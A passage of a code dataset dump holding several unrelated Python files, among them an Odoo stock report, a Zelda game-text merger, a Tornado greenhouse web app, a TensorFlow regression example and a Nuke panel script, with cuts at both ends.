stock_picking_obj.browse(self.cr, self.uid, picking_ids):\n if pick.move_lines:\n for move in pick.move_lines:\n l['llocation'] = move.location_id and move.location_id.name\n l['lorigin'] = pick.sale_id and pick.sale_id.name\n elif move_ids:\n for stock in stock_move_obj.browse(self.cr, self.uid, move_ids):\n l['llocation'] = stock.location_id and stock.location_id.name\n l['lref'] = l['lname']\n #l['standard_price'] = stock.product_id.standard_price\n #l['lorigin'] = l['lname']\n #print \"move_line\",move_line,l['lorigin'],l['lid']\n #print \"line_move_ids\",l['mmove_id'],\", \".join(line_move_ids)\n #l['pproduct'] = l['pproduct']\n #l['lref'] = l['lref'] or l['lname']\n l['product_awal'] = ''#(l['debit'] > 0 and l['lqty_in']) - (l['credit'] > 0 and l['lqty_out'])\n l['product_masuk'] = (l['debit'] > 0 and l['lqty_in']) or (l['debit']-l['credit']) == 0 and 'IN/' in l['lref'] and l['lqty_in']\n l['product_keluar'] = (l['credit'] > 0 and l['lqty_out']) or (l['debit']-l['credit']) == 0 and 'OUT/' in l['lref'] and l['lqty_out']\n account_sum+=(l['product_masuk'] - l['product_keluar'])\n product = product_obj.browse(self.cr, self.uid, l['prodid'])\n #print \"=================\",product.standard_price,account_sum+account['product_awal']\n l['product_akhir'] = (account['product_awal'])+account_sum#\\\\l['lqty_in'] - l['product_masuk'] - l['product_keluar']\n \n l['saldo_awal'] = ''#l['debit'] - l['credit']\n l['saldo_masuk'] = l['debit'] > 0 and l['debit']\n l['saldo_keluar'] = l['credit'] > 0 and l['credit']\n saldo_sum+=(l['saldo_masuk'] - l['saldo_keluar'])\n l['saldo_akhir'] = (account['saldo_awal'])+saldo_sum#l['saldo_awal'] + l['saldo_masuk'] - l['saldo_keluar']\n# if 'IN/' in l['lref']:\n# standard_ids = product_standard_obj.search(self.cr, self.uid, [('product_tmpl_id','=',product.product_tmpl_id.id)])\n# if not standard_ids:\n# if l['product_akhir'] != 0.0:\n# standard_price = (((l['product_akhir']-l['product_masuk'])*product.standard_price)+l['saldo_masuk'])/l['product_akhir']\n# else:\n# standard_price = product.standard_price\n# values_create= {\n# 'name': l['ldate'],\n# 'product_tmpl_id': product.product_tmpl_id and product.product_tmpl_id.id,\n# 'standard_price': standard_price,\n# }\n# print \"---------create_new---------\",values_create\n# #product_standard_obj.create(self.cr, self.uid, values_create)\n# #print \"=================\",(((l['product_akhir']-l['product_masuk'])*product.standard_price)+l['saldo_masuk'])/l['product_akhir']#product.standard_price,account_sum+account['product_awal'],l['product_masuk'],l['saldo_masuk']\n# elif standard_ids:\n# standard_ids = product_standard_obj.search(self.cr, self.uid, [('name','!=',l['ldate']),('product_tmpl_id','=',product.product_tmpl_id.id)])\n# standard_duplicate_ids = product_standard_obj.search(self.cr, self.uid, [('name','=',l['ldate']),('product_tmpl_id','=',product.product_tmpl_id.id)])\n# if standard_ids:\n# standard_last_ids = product_standard_obj.search(self.cr, self.uid, [('product_tmpl_id','=',product.product_tmpl_id.id)], limit=1, order='name DESC')\n# standard_last = product_standard_obj.browse(self.cr, self.uid, standard_last_ids[0])\n# if l['product_akhir'] != 0.0:\n# standard_price = (((l['product_akhir']-l['product_masuk'])*standard_last.standard_price)+l['saldo_masuk'])/l['product_akhir']\n# else:\n# standard_price = standard_last.standard_price\n# values_add= {\n# 'name': l['ldate'],\n# 'product_tmpl_id': product.product_tmpl_id and product.product_tmpl_id.id,\n# 'standard_price': standard_price,\n# }\n# if not standard_duplicate_ids:\n# print \"-----ini-----(((\",l['product_akhir'],\"-\",l['product_masuk'],\")*\",standard_last.standard_price,\")+\",l['saldo_masuk'],\")/\",l['product_akhir']\n# print \"------add------\",values_add\n# #product_standard_obj.create(self.cr, self.uid, values_add)\n# l['move'] = l['move_name'] != '/' and l['move_name'] or (str(l['mmove_id']))\n# #l['faktur_pajak_no'] = l['faktur_pajak_no'] or ''\n# l['partner'] = l['partner_name'] or ''\n# l['aaname'] = l['aaname'] or ''\n# l['aname'] = l['aname'] or ''\n# l['lacc'] = ''\n# if line_move_ids:\n# l['lacc'] = \", \".join(line_move_ids)\n# l['acode'] = l['acode'] or ''\n# account_sum += l['debit'] - l['credit']\n# l['progress'] = account_sum\n# #l['line_corresp'] = l['mmove_id'] == '' and ' ' or counterpart_accounts[l['mmove_id']].replace(', ',',')\n# # Modification of amount Currency\n# if l['credit'] > 0:\n# if l['amount_currency'] != None:\n# l['amount_currency'] = abs(l['amount_currency']) * -1\n #print \"res-----------\",res\n return res\n","sub_path":"ad_laporan_management/report/report_stock_management.py","file_name":"report_stock_management.py","file_ext":"py","file_size_in_byte":27155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"29747728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nclass Gan:\n \"\"\"\n 甘特图单条事务对象\n \"\"\"\n def __init__(self, start_time, end_time, state_code, hover_info):\n \"\"\"\n :param start_time: 开始时间,13位时间戳,int\n :param end_time: 结束时间,13位时间戳,int\n :param state_code: 状态码,自定义,int\n :param hover_info: 事务对象更多信息,自定义,dict\n \"\"\"\n self.start_time = start_time\n self.end_time = end_time\n self.state = state_code\n self.hover_info = hover_info","sub_path":"data/gantt.py","file_name":"gantt.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"545752996","text":"\"\"\"Provides functions for diffing and merging BotW game text files\"\"\"\r\n# Copyright 2020 Nicene Nerd \r\n# Licensed under GPLv3+\r\nimport json\r\nimport multiprocessing\r\nimport subprocess\r\nfrom functools import partial, lru_cache\r\nfrom pathlib import Path\r\nfrom platform import system\r\nfrom tempfile import TemporaryDirectory, NamedTemporaryFile\r\nfrom typing import List, Union, ByteString\r\n\r\nimport oead\r\nimport xxhash\r\n\r\nfrom bcml import mergers, util\r\nfrom bcml.util import get_7z_path\r\n\r\nEXCLUDE_TEXTS = [\r\n \"ErrorMessage\",\r\n \"StaffRoll\",\r\n \"LayoutMsg/MessageTipsRunTime_00\",\r\n \"LayoutMsg/OptionWindow_00\",\r\n \"LayoutMsg/SystemWindow_00\",\r\n]\r\n\r\nLANGUAGES = [\r\n \"USen\",\r\n \"EUen\",\r\n \"USfr\",\r\n \"USes\",\r\n \"EUde\",\r\n \"EUes\",\r\n \"EUfr\",\r\n \"EUit\",\r\n \"EUnl\",\r\n \"EUru\",\r\n \"CNzh\",\r\n \"JPja\",\r\n \"KRko\",\r\n \"TWzh\",\r\n]\r\n\r\nMSYT_PATH = str(\r\n util.get_exec_dir()\r\n / \"helpers\"\r\n / \"msyt{}\".format(\".exe\" if system() == \"Windows\" else \"\")\r\n)\r\n\r\n\r\n@lru_cache(2)\r\ndef get_text_hashes(language: str = None) -> {}:\r\n hashes = json.loads(\r\n util.decompress(\r\n (util.get_exec_dir() / \"data\" / \"hashes\" / \"msyts.sjson\").read_bytes()\r\n ).decode(\"utf8\")\r\n )\r\n if language:\r\n return hashes[language if not language.endswith(\"en\") else \"XXen\"]\r\n else:\r\n return hashes\r\n\r\n\r\ndef match_language(lang: str, log_dir: Path) -> str:\r\n logged_langs = set([util.get_file_language(l) for l in log_dir.glob(\"*texts*\")])\r\n if lang in logged_langs:\r\n return lang\r\n elif lang[2:4] in [l[2:4] for l in logged_langs]:\r\n return [l for l in logged_langs if l[2:4] == lang[2:4]][0]\r\n else:\r\n return [l for l in LANGUAGES if l in logged_langs][0]\r\n\r\n\r\ndef msbt_to_msyt(folder: Path, pool: multiprocessing.Pool = None):\r\n \"\"\" Converts MSBTs in given temp dir to MSYTs \"\"\"\r\n if system() == \"Windows\":\r\n subprocess.run(\r\n [MSYT_PATH, \"export\", \"-d\", str(folder)],\r\n creationflags=util.CREATE_NO_WINDOW,\r\n check=False,\r\n )\r\n else:\r\n subprocess.run([MSYT_PATH, \"export\", \"-d\", str(folder)], check=False)\r\n fix_msbts = [\r\n msbt\r\n for msbt in folder.rglob(\"**/*.msbt\")\r\n if not msbt.with_suffix(\".msyt\").exists()\r\n ]\r\n if fix_msbts:\r\n print(\"Some MSBTs failed to convert. Trying again individually...\")\r\n this_pool = pool or multiprocessing.Pool(maxtasksperchild=500)\r\n this_pool.map(partial(_msyt_file), fix_msbts)\r\n fix_msbts = [\r\n msbt\r\n for msbt in folder.rglob(\"**/*.msbt\")\r\n if not msbt.with_suffix(\".msyt\").exists()\r\n ]\r\n if not pool:\r\n this_pool.close()\r\n this_pool.join()\r\n if fix_msbts:\r\n print(\r\n f\"{len(fix_msbts)} MSBT files failed to convert. They will not be merged.\"\r\n )\r\n util.vprint(fix_msbts)\r\n for msbt_file in folder.rglob(\"**/*.msbt\"):\r\n Path(msbt_file).unlink()\r\n return fix_msbts\r\n\r\n\r\ndef _msyt_file(file, output: Path = None):\r\n m_args = [MSYT_PATH, \"export\", str(file)]\r\n if output:\r\n m_args += [\"--output\", str(output)]\r\n if system() == \"Windows\":\r\n result = subprocess.run(\r\n m_args,\r\n creationflags=util.CREATE_NO_WINDOW,\r\n capture_output=True,\r\n text=True,\r\n check=False,\r\n )\r\n else:\r\n result = subprocess.run(m_args, capture_output=True, text=True, check=False)\r\n if result.stderr:\r\n raise ValueError(\r\n f\"The MSBT file {file} could not be read.\"\r\n \"Please contact the mod developer for assistance.\"\r\n ) from RuntimeError(\r\n (\r\n result.stderr.replace(\"an error occurred - see below for details\", \"\")\r\n .replace(\"\\n\", \" \")\r\n .capitalize()\r\n )\r\n )\r\n\r\n\r\ndef read_msbt(file: Union[Path, ByteString]):\r\n tmp_file = Path(NamedTemporaryFile(suffix=\".msyt\").name)\r\n if not isinstance(file, Path):\r\n tmp_file.with_suffix(\".msbt\").write_bytes(file)\r\n file = tmp_file.with_suffix(\".msbt\")\r\n _msyt_file(file, tmp_file)\r\n tmp_text = tmp_file.read_text(\"utf-8\")\r\n tmp_file.unlink()\r\n return json.loads(tmp_text)\r\n\r\n\r\ndef extract_refs(language: str, tmp_dir: Path, files: set = None):\r\n x_args = [\r\n get_7z_path(),\r\n \"x\",\r\n str(util.get_exec_dir() / \"data\" / \"text_refs.7z\"),\r\n f'-o{str(tmp_dir / \"refs\")}',\r\n ]\r\n if files:\r\n x_args.extend(files)\r\n else:\r\n x_args.append(language)\r\n result: subprocess.CompletedProcess\r\n if system() == \"Windows\":\r\n result = subprocess.run(\r\n x_args,\r\n capture_output=True,\r\n creationflags=util.CREATE_NO_WINDOW,\r\n check=False,\r\n text=True,\r\n )\r\n else:\r\n result = subprocess.run(x_args, capture_output=True, text=True, check=False)\r\n if result.stderr:\r\n raise RuntimeError(result.stderr)\r\n\r\n\r\ndef diff_msyt(msyt: Path, hashes: dict, mod_out: Path, ref_dir: Path):\r\n diff = {}\r\n filename = msyt.relative_to(mod_out).as_posix()\r\n if any(ex in filename for ex in EXCLUDE_TEXTS):\r\n msyt.unlink()\r\n return {}\r\n data = msyt.read_bytes()\r\n xxh = xxhash.xxh64_intdigest(data)\r\n if filename in hashes and hashes[filename] == xxh:\r\n pass\r\n else:\r\n text = data.decode(\"utf8\")\r\n if filename not in hashes:\r\n diff[filename] = json.loads(text)[\"entries\"]\r\n else:\r\n ref_text = (ref_dir / filename).read_text(\"utf-8\")\r\n if \"\".join(text.split()) != \"\".join(ref_text.split()):\r\n ref_contents = json.loads(ref_text)\r\n contents = json.loads(text)\r\n diff[filename] = {\r\n entry: value\r\n for entry, value in contents[\"entries\"].items()\r\n if (\r\n entry not in ref_contents[\"entries\"]\r\n or value != ref_contents[\"entries\"][entry]\r\n )\r\n }\r\n else:\r\n pass\r\n del ref_text\r\n del text\r\n msyt.unlink()\r\n del data\r\n return diff\r\n\r\n\r\ndef diff_language(bootup: Path, pool: multiprocessing.Pool = None) -> {}:\r\n diff = {}\r\n language = bootup.name[7:-5]\r\n bootup_sarc = oead.Sarc(bootup.read_bytes())\r\n msg_sarc = oead.Sarc(\r\n util.decompress(\r\n bootup_sarc.get_file(f\"Message/Msg_{language}.product.ssarc\").data\r\n )\r\n )\r\n\r\n with TemporaryDirectory() as tmp:\r\n tmp_dir = Path(tmp)\r\n mod_out = tmp_dir / \"mod\"\r\n print(\"Extracting mod texts...\")\r\n for file in msg_sarc.get_files():\r\n out = mod_out / file.name\r\n out.parent.mkdir(parents=True, exist_ok=True)\r\n out.write_bytes(file.data)\r\n del msg_sarc\r\n\r\n print(\"Converting texts to MSYT...\")\r\n msbt_to_msyt(mod_out, pool=pool)\r\n hashes = get_text_hashes(language)\r\n ref_lang = \"XXen\" if language.endswith(\"en\") else language\r\n print(\"Extracting reference texts...\")\r\n extract_refs(ref_lang, tmp_dir)\r\n ref_dir = tmp_dir / \"refs\" / ref_lang\r\n\r\n this_pool = pool or multiprocessing.Pool(maxtasksperchild=500)\r\n print(\"Identifying modified text files...\")\r\n results = this_pool.map(\r\n partial(diff_msyt, ref_dir=ref_dir, hashes=hashes, mod_out=mod_out),\r\n mod_out.rglob(\"**/*.msyt\"),\r\n )\r\n if not pool:\r\n this_pool.close()\r\n this_pool.join()\r\n for result in results:\r\n diff.update(result)\r\n return diff\r\n\r\n\r\ndef merge_msyt(file_data: tuple, tmp_dir: Path):\r\n filename: str = file_data[0]\r\n changes: dict = file_data[1]\r\n out = tmp_dir / filename\r\n if out.exists():\r\n text_data = json.loads(out.read_text(\"utf-8\"))\r\n text_data[\"entries\"].update(changes)\r\n out.write_text(json.dumps(text_data, ensure_ascii=False), encoding=\"utf-8\")\r\n else:\r\n out.parent.mkdir(parents=True, exist_ok=True)\r\n out.write_text(\r\n json.dumps(\r\n {\r\n \"group_count\": len(changes),\r\n \"atr1_unknown\": 0 if \"EventFlowMsg\" not in filename else 4,\r\n \"entries\": changes,\r\n },\r\n ensure_ascii=False,\r\n ),\r\n encoding=\"utf-8\",\r\n )\r\n\r\n\r\nclass TextsMerger(mergers.Merger):\r\n # pylint: disable=abstract-method\r\n \"\"\" A merger for game texts \"\"\"\r\n NAME: str = \"texts\"\r\n\r\n def __init__(self, all_langs: bool = False):\r\n super().__init__(\r\n \"game texts\",\r\n \"Merges changes to game texts\",\r\n \"texts.json\",\r\n options={\"all_langs\": all_langs},\r\n )\r\n\r\n def generate_diff(self, mod_dir: Path, modded_files: List[Union[str, Path]]):\r\n print(\"Checking for modified languages...\")\r\n languages = {\r\n util.get_file_language(file)\r\n for file in modded_files\r\n if (\r\n isinstance(file, Path)\r\n and \"Bootup_\" in file.name\r\n and \"Graphic\" not in file.name\r\n )\r\n }\r\n if not languages:\r\n return None\r\n util.vprint(f'Languages: {\",\".join(languages)}')\r\n\r\n language_map = {}\r\n save_langs = (\r\n LANGUAGES\r\n if self._options.get(\"all_langs\", False)\r\n else [util.get_settings(\"lang\")]\r\n )\r\n for lang in save_langs:\r\n if lang in languages:\r\n language_map[lang] = lang\r\n elif lang[2:4] in [l[2:4] for l in languages]:\r\n language_map[lang] = [l for l in languages if l[2:4] == lang[2:4]][0]\r\n else:\r\n language_map[lang] = [l for l in LANGUAGES if l in languages][0]\r\n util.vprint(f\"Language map:\")\r\n util.vprint(language_map)\r\n\r\n language_diffs = {}\r\n for language in set(language_map.values()):\r\n print(f\"Logging text changes for {language}...\")\r\n language_diffs[language] = diff_language(\r\n mod_dir / util.get_content_path() / \"Pack\" / f\"Bootup_{language}.pack\",\r\n pool=self._pool,\r\n )\r\n\r\n return {\r\n save_lang: language_diffs[map_lang]\r\n for save_lang, map_lang in language_map.items()\r\n }\r\n\r\n def log_diff(self, mod_dir: Path, diff_material):\r\n if isinstance(diff_material, List):\r\n diff_material = self.generate_diff(mod_dir, diff_material)\r\n if diff_material:\r\n (mod_dir / \"logs\" / self._log_name).write_text(\r\n json.dumps(diff_material, ensure_ascii=False, indent=2),\r\n encoding=\"utf-8\",\r\n )\r\n\r\n def get_mod_diff(self, mod: util.BcmlMod):\r\n diff = {}\r\n if self.is_mod_logged(mod):\r\n util.dict_merge(\r\n diff,\r\n json.loads((mod.path / \"logs\" / self._log_name).read_text(\"utf-8\")),\r\n )\r\n for opt in {d for d in (mod.path / \"options\").glob(\"*\") if d.is_dir()}:\r\n if (opt / \"logs\" / self._log_name).exists():\r\n util.dict_merge(\r\n diff,\r\n json.loads((opt / \"logs\" / self._log_name).read_text(\"utf-8\")),\r\n overwrite_lists=True,\r\n )\r\n return diff\r\n\r\n def get_mod_edit_info(self, mod: util.BcmlMod) -> set:\r\n diffs = set()\r\n if self.is_mod_logged(mod):\r\n for files in self.get_mod_diff(mod).values():\r\n diffs |= set(files.keys())\r\n return diffs\r\n\r\n def get_all_diffs(self):\r\n diffs = []\r\n for mod in util.get_installed_mods():\r\n diff = self.get_mod_diff(mod)\r\n if diff:\r\n diffs.append(diff)\r\n return diffs\r\n\r\n def consolidate_diffs(self, diffs: list):\r\n if not diffs:\r\n return {}\r\n main_diff = diffs[0]\r\n for diff in diffs[1:]:\r\n for lang, content in diff.items():\r\n if lang not in main_diff:\r\n main_diff[lang] = content\r\n else:\r\n for file, entries in content.items():\r\n if file not in main_diff[lang]:\r\n main_diff[lang][file] = entries\r\n else:\r\n for entry, msg in entries.items():\r\n main_diff[lang][file][entry] = msg\r\n return main_diff\r\n\r\n @util.timed\r\n def perform_merge(self):\r\n # pylint: disable=unsupported-assignment-operation\r\n langs = (\r\n {util.get_settings(\"lang\")}\r\n if not self._options[\"all_langs\"]\r\n else util.get_user_languages()\r\n )\r\n for lang in langs:\r\n print(\"Loading text mods...\")\r\n diffs = self.consolidate_diffs(self.get_all_diffs())\r\n if not diffs or lang not in diffs:\r\n print(\"No text merge necessary\")\r\n for bootup in util.get_master_modpack_dir().rglob(\r\n \"**/Bootup_????.pack\"\r\n ):\r\n bootup.unlink()\r\n return\r\n util.vprint(\r\n {\r\n lang: {\r\n file: list(entries.keys())\r\n for file, entries in diffs[lang].items()\r\n }\r\n }\r\n )\r\n\r\n print(f\"Merging modded texts for {lang}...\")\r\n saved_files = set()\r\n with TemporaryDirectory() as tmp:\r\n tmp_dir = Path(tmp)\r\n ref_lang = \"XXen\" if lang.endswith(\"en\") else lang\r\n extract_refs(ref_lang, tmp_dir)\r\n tmp_dir = tmp_dir / \"refs\" / ref_lang\r\n this_pool = self._pool or multiprocessing.Pool(maxtasksperchild=500)\r\n this_pool.map(partial(merge_msyt, tmp_dir=tmp_dir), diffs[lang].items())\r\n if not self._pool:\r\n this_pool.close()\r\n this_pool.join()\r\n\r\n m_args = [\r\n MSYT_PATH,\r\n \"create\",\r\n \"-d\",\r\n str(tmp_dir),\r\n \"-p\",\r\n \"wiiu\" if util.get_settings(\"wiiu\") else \"switch\",\r\n \"-o\",\r\n str(tmp_dir),\r\n ]\r\n result: subprocess.CompletedProcess\r\n if system() == \"Windows\":\r\n result = subprocess.run(\r\n m_args,\r\n capture_output=True,\r\n creationflags=util.CREATE_NO_WINDOW,\r\n check=False,\r\n text=True,\r\n )\r\n\r\n else:\r\n result = subprocess.run(\r\n m_args,\r\n capture_output=True,\r\n check=False,\r\n text=True,\r\n )\r\n if result.stderr:\r\n raise RuntimeError(\r\n f\"There was an error merging game texts. {result.stderr}\"\r\n )\r\n\r\n msg_sarc = oead.SarcWriter(\r\n endian=oead.Endianness.Big\r\n if util.get_settings(\"wiiu\")\r\n else oead.Endianness.Little\r\n )\r\n for file in tmp_dir.rglob(\"**/*.msbt\"):\r\n msg_sarc.files[\r\n file.relative_to(tmp_dir).as_posix()\r\n ] = file.read_bytes()\r\n saved_files.add(file.relative_to(tmp_dir).as_posix())\r\n bootup_sarc = oead.SarcWriter(\r\n endian=oead.Endianness.Big\r\n if util.get_settings(\"wiiu\")\r\n else oead.Endianness.Little\r\n )\r\n bootup_sarc.files[f\"Message/Msg_{lang}.product.ssarc\"] = util.compress(\r\n msg_sarc.write()[1]\r\n )\r\n\r\n bootup_path = (\r\n util.get_master_modpack_dir()\r\n / util.get_content_path()\r\n / \"Pack\"\r\n / f\"Bootup_{lang}.pack\"\r\n )\r\n bootup_path.parent.mkdir(parents=True, exist_ok=True)\r\n bootup_path.write_bytes(bootup_sarc.write()[1])\r\n del bootup_sarc\r\n del msg_sarc\r\n print(f\"{lang} texts merged successfully\")\r\n\r\n def get_checkbox_options(self) -> List[tuple]:\r\n return [\r\n (\"all_langs\", \"Merge texts for all game languages\"),\r\n ]\r\n","sub_path":"bcml/mergers/texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":16902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"386869217","text":"from core.core import Core\nimport tornado.auth\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.process\nimport os.path\nfrom web import *\n\nDEBUG = False\ncore = Core(DEBUG)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/\", main_handler.MainHandler, dict(co=core)),\n (r\"/enviroment\", enviromentdata_handler.EnviromentDataHandler, dict(co=core)),\n (r\"/shot\", PhotoHandler),\n (r\"/settings\", SettingsHandler),\n (r\"/power\", powerdata_handler.PowerDataHandler, dict(co=core)),\n (r\"/charts\", ChartsHandler),\n (r\"/reports\", report_handler.ReportHandler, dict(co=core))\n ]\n settings = dict(\n debug=DEBUG,\n cookie_secret=\"43oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n )\n tornado.web.Application.__init__(self, handlers, **settings)\n\n\n\nclass PhotoHandler(tornado.web.RequestHandler):\n def get(self):\n core.camera.snapshot()\n\nclass SettingsHandler(tornado.web.RequestHandler):\n def get(self):\n maxTemp = core.config.maxTemp()\n targetTemp = core.config.tgtTemp()\n ligt_start = core.config.light_start()\n light_hours = core.config.light_hours()\n self.render(\"settings.html\", title=\"Greenhouse\",\n max_temp=maxTemp, tgt_temp=targetTemp,\n light_start=ligt_start, light_hours=light_hours)\n\n def post(self):\n maxT = self.get_argument('maxTemperature')\n tgtT = self.get_argument('targetTemperature')\n hours = self.get_argument('lightHours')\n start = self.get_argument('startHour')\n core.config.maxTemp(maxT)\n core.wrapper.max(str(maxT))\n core.config.tgtTemp(tgtT)\n core.wrapper.target(str(tgtT))\n\n core.config.light_hours(hours)\n core.config.light_start(start)\n\n\nclass ChartsHandler(tornado.web.RequestHandler):\n\n def get(self):\n self.render(\"charts.html\", title=\"Greenhouse\")\n\n\nif __name__ == \"__main__\":\n core.start()\n app = Application()\n app.listen(8888)\n tornado.ioloop.IOLoop.current().start()\n\n","sub_path":"Greenhouse_control/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"192422626","text":"#!/usr/bin/env python3\nimport re\n\nif __name__ == '__main__':\n with open('data.txt', 'r') as file:\n raw_data = file.read()\n\n raw_data = re.sub(r'[BR]', '1', raw_data)\n raw_data = re.sub(r'[FL]', '0', raw_data)\n data = raw_data.split(\"\\n\")[:-1]\n\n ids = set()\n \n for entry in data:\n row = int(entry[:7], base=2)\n col = int(entry[7:], base=2)\n ids.add(row * 8 + col)\n \n min_id = min(ids)\n max_id = max(ids)\n print(f\"Max: {max_id}\")\n\n all_ids = set(range(min_id, max_id))\n\n missing = all_ids - ids\n\n print(f\"Missing IDs: {missing}\")\n","sub_path":"day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"94164877","text":"# To support both python 2 and python 3\nfrom __future__ import division, print_function, unicode_literals\n\n# Common imports\nimport numpy as np\nimport tensorflow as tf\n\n\n# initialize variables/model parameters\nW = tf.Variable(tf.zeros([2, 1]), name=\"weights\")\nb = tf.Variable(0., name=\"bias\")\n\n# define the training phase operations\ndef inference(X):\n\t# how to in inference model over data X and predict Y\n\treturn tf.matmul(X, W) + b\n\n\ndef loss(X, Y):\n\t# MSE\n\tY_predicted = inference(X)\n\treturn tf.reduce_mean(tf.square(Y - Y_predicted))\n\n\ndef inputs():\n\tweight_age = [[84, 46], [73, 20], [65, 52], [70, 30], [76, 57], [69, 25], [63, 28], [72, 36], [79, 57], [75, 44], [27, 24], [89, 31], [65, 52], [57, 23], [59, 60], [69, 48], [60, 34], [79, 51], [75, 50], [82, 34], [59, 46], [67, 23], [85, 37], [55, 40], [63, 30]]\n\tblood_fat_content = [354, 190, 405, 263, 451, 302, 288, 385, 402, 365, 209, 290, 346, 254, 395, 434, 220, 374, 308, 220, 311, 181, 274, 303, 244]\n\n\treturn(tf.cast(weight_age, tf.float32), tf.cast(blood_fat_content, tf.float32))\n\n\ndef train(total_loss):\n\tlearning_rate = 0.0000001\n\treturn tf.train.GradientDescentOptimizer(learning_rate).minimize(total_loss)\n\n\ndef evaluate(sess, X, Y):\n\t# evaluate the resulting trained model\n\tprint(sess.run(inference([[80., 25.]])))\n\tprint(sess.run(inference([[65., 25.]])))\n\n\n# before 0.12\n#init = tf.initialize_all_variable()\n# after 0.12\ninit = tf.global_variables_initializer()\n\n# Create a saver to save model\nsaver = tf.train.Saver()\nmodel_path = \"models/linear_regression/lr\"\n\n\nwith tf.Session() as sess:\n\tsess.run(init)\n\n\t# get inputs\n\tX, Y = inputs()\n\n\t# get traing operation that will minimize the loss\n\ttotal_loss = loss(X, Y)\n\ttrain_op = train(total_loss)\n\n\t# prepare multi threads env\n\tcoord = tf.train.Coordinator()\n\tthreads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n\t## actual training \n\ttraining_steps = 1000\n\tfor step in range(training_steps):\n\t\tsess.run(train_op)\n\t\t# check loss\n\t\tif step % 10 == 0:\n\t\t\tprint(\"loss\", sess.run(total_loss))\n\t\t# save temp model \n\t\tif step % 1000 == 0:\n\t\t\tsaver.save(sess, model_path, global_step=step)\n\n\t# evaluate performance with test data\n\tevaluate(sess, X, Y)\n\n\t# save final model\n\tsaver.save(sess, model_path, global_step=training_steps)\n\n\t# stop threads\n\tcoord.request_stop()\n\tcoord.join(threads)\n\t\n\t# close session\n\tsess.close()\n\n\n\n\n","sub_path":"2017.01.23-NeuralNetwork/templates/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"214892999","text":"import crawler\nimport database\n\n#Debug\nimport time\ntotal_time = time.time()\n\ndef main():\n #############################\n ##### Define options #####\n #############################\n city = 'Cincinnati'\n state = 'Ohio'\n browser = 'FIREFOX' #FIREFOX or CHROME. Havent tested with Chrome yet\n headless = False #Open the browser in headless mode = True/False\n implicitly_wait = 20 #Seconds to wait implicitly if not explicitly set\n database_file = r'data/pythonsqlite.db'\n\n #############################\n ##### Database Setup ####\n #############################\n #Create empty database with auction and auction_items table\n database.setup_database(database_file)\n connection = database.create_connection(database_file)\n\n #############################\n ###### Web Scraping ######\n #############################\n #Driver setup\n driver,wait5,wait_halfsec = crawler.setup_driver(headless,browser,implicitly_wait)\n\n #Get all auctions\n all_auctions = crawler.find_all_auctions_by_city(driver,wait5,city,state)\n\n #Add items to all auctions\n crawler.add_items_to_all_auctions(driver,wait5,wait_halfsec,all_auctions,connection)\n\n #############################\n ##### Cleanup #####\n #############################\n connection.close()\n crawler.clean_up(driver)\n\n #Debug\n print(\"--- %s seconds ---\" % (time.time() - total_time))\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception as e:\n print(e)\n print(\"Failed to complete the crawl, auctions and items will remain in the DB until cleared\")","sub_path":"conductor.py","file_name":"conductor.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"15274262","text":"#!/usr/bin/env python\r\n#\r\n#----------------------------------------------------------------\r\n# Name: ParameterReplace.py\r\n# Version: 1.0\r\n# Purpose: Modify one parameter of similar named nodes\r\n#\r\n# Author: Christian Schulze\r\n# Email: mail@christian-schulze.eu\r\n#\r\n# Created: 2011/07/19\r\n# Copyright (C) 2011 Christian Schulze\r\n#----------------------------------------------------------------\r\n\r\n\r\nimport nukescripts\r\n\r\nif nuke.env[\"gui\"]:\r\n class ParameterReplace( nukescripts.PythonPanel ):\r\n def __init__( self ):\r\n nukescripts.PythonPanel.__init__( self, \"Parameter Replace\" )\r\n self.nodenames = nuke.String_Knob( \"nodenames\", \"Node Names:\" )\r\n self.nodenames.setValue( 'Transform' )\r\n self.addKnob( self.nodenames )\r\n self.parameter = nuke.String_Knob( \"parameter\", \"Parameter:\" )\r\n self.parameter.setValue( 'scale' )\r\n self.addKnob( self.parameter )\r\n self.istart = nuke.Int_Knob( \"istart\", \"Index Start:\" )\r\n self.istart.setValue( 1 )\r\n self.addKnob( self.istart )\r\n self.iend = nuke.Int_Knob( \"iend\", \"Index End:\" )\r\n self.iend.setValue( 10 )\r\n self.addKnob( self.iend )\r\n self.xfactor = nuke.Double_Knob( \"xfactor\", \"Factor X:\" )\r\n self.xfactor.setValue( 1 )\r\n self.xfactor.setRange( -10 , 10 )\r\n self.addKnob( self.xfactor )\r\n self.yfactor = nuke.Double_Knob( \"yfactor\", \"Factor Y:\" )\r\n self.yfactor.setValue( 1 )\r\n self.yfactor.setRange( -10 , 10 )\r\n self.addKnob( self.yfactor )\r\n self.xadd = nuke.Double_Knob( \"xadd\", \"Add X:\" )\r\n self.xadd.setValue( 0 )\r\n self.xadd.setRange( -100 , 100 )\r\n self.addKnob( self.xadd )\r\n self.yadd = nuke.Double_Knob( \"yadd\", \"Add Y:\" )\r\n self.yadd.setValue( 0 )\r\n self.yadd.setRange( -100 , 100 )\r\n self.addKnob( 